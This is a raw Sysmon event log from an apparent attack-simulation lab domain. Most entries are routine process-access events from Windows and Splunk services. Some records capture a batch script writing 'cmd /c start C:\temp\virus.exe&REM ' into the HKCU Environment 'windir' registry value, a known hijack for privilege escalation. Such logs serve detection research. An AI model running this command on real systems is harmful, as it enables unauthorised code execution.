07:56:54.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:54.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.200{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F5C6-60EB-637D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.200{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F5C6-60EB-637D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.180{466BC892-F5C6-60EB-637D-00000000CF01}8948C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001050539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:54.084{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=920B9BB2E5716C7181B6AB2793F8FEB4,SHA256=C744057D6A9D17508133EF6C9D68CDC55249B92D93FCCFD0FA4A05358E58A4BD,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000808408Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:55.590{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA7E4FC9E38A736238FF24EFA5BEB269,SHA256=C79088660911C4FBA1758D4E498356BFA634582465596CDF114B030EEE7C560E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:55.500{466BC892-02AD-60E8-0B00-00000000CF01}6243480C:\Windows\system32\lsass.exe{466BC892-02AB-60E8-0100-00000000CF01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001050551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:55.185{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77DA38727514CFC59C2F171BF0839645,SHA256=8E58A145FA4B9708E959FF47CB3B5A0A5522D76083D61283ECD3275CFA185AEA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:55.100{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCF8A229757AAB904C574B78B15FB186,SHA256=F033FD899C4466E955C250DAECB104E2EE2F80A75A8074F7A211AFE436697286,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808409Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:56.606{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D18D7588547FEDF5764B157E42B1AE34,SHA256=807831482D19F19C196CDCA76AD68BE22209EB9995C4A82719B939B39A0799A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.500{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=14371A1AA410693C265BA0C9EAB19985,SHA256=1061ACDCC74C3068A62EE86D00CE9F39E6AD233F3565F144034F78A4412AC281,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.463{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED47B92872BB82EF587E939A4CC76D31,SHA256=25390ED2743430B5D6F85E6AF6DC9FB7237956409E4070C608FCE0C27D676B13,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001050605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.263{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5C8-60EB-687D-00000000CF01}8820C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.263{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.263{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.263{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050601Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.263{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.263{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5C8-60EB-687D-00000000CF01}8820C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.263{466BC892-F5C8-60EB-647D-00000000CF01}98726276C:\Windows\system32\cmd.exe{466BC892-F5C8-60EB-687D-00000000CF01}8820C:\Windows\system32\timeout.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050598Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.268{466BC892-F5C8-60EB-687D-00000000CF01}8820C:\Windows\System32\timeout.exe10.0.14393.0 (rs1_release.160715-1616)timeout - pauses command processingMicrosoft® Windows® Operating SystemMicrosoft Corporationtimeout.exetimeout /t 2 C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=FF04FB5121867334F841D5EFD133633B,SHA256=F9B3348029B76BBB658A097BF361EA72CEFA0D15CE444E9E8A689B35B67A78E7,IMPHASH=709A3AA304E78434B9FA3FE865133AD0{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 13241300x80000000000000001050597Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 07:56:56.263{466BC892-F5C8-60EB-677D-00000000CF01}6884C:\Windows\system32\reg.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112\Environment\windircmd /c start C:\temp\virus.exe&REM 10341000x80000000000000001050596Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.247{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5C8-60EB-677D-00000000CF01}6884C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050595Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050594Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050593Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050592Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.247{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050591Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.247{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F5C8-60EB-677D-00000000CF01}6884C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001050590Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.247{466BC892-F5C8-60EB-647D-00000000CF01}98726276C:\Windows\system32\cmd.exe{466BC892-F5C8-60EB-677D-00000000CF01}6884C:\Windows\system32\reg.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+8ad9|C:\Windows\system32\cmd.exe+6fdd|C:\Windows\system32\cmd.exe+11a9e|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001050589Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.254{466BC892-F5C8-60EB-677D-00000000CF01}6884C:\Windows\System32\reg.exe10.0.14393.0 (rs1_release.160715-1616)Registry Console ToolMicrosoft® Windows® Operating SystemMicrosoft Corporationreg.exereg add "HKCU\Environment" /v "windir" /d "cmd /c start C:\temp\virus.exe&REM " C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=59A22FA6CF85026BB6BC69A1ADD75C50,SHA256=9E28034CE3AEEA6951F790F8997DF44CFBF80BEFF9FB17413DBA317016A716AD,IMPHASH=EE7EB7FA7D163340753B7223ADA14352{466BC892-F5C8-60EB-647D-00000000CF01}9872C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Temp\test\sil.bat" " 10341000x80000000000000001050588Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:56:56.200{466BC892-F5C8-60EB-657D-00000000CF01}84086488C:\Windows\system32\conhost.exe{466BC892-F5C8-60EB-667D-00000000CF01}9408C:\Windows\system32\mode.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050587Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:56.200{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050586Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
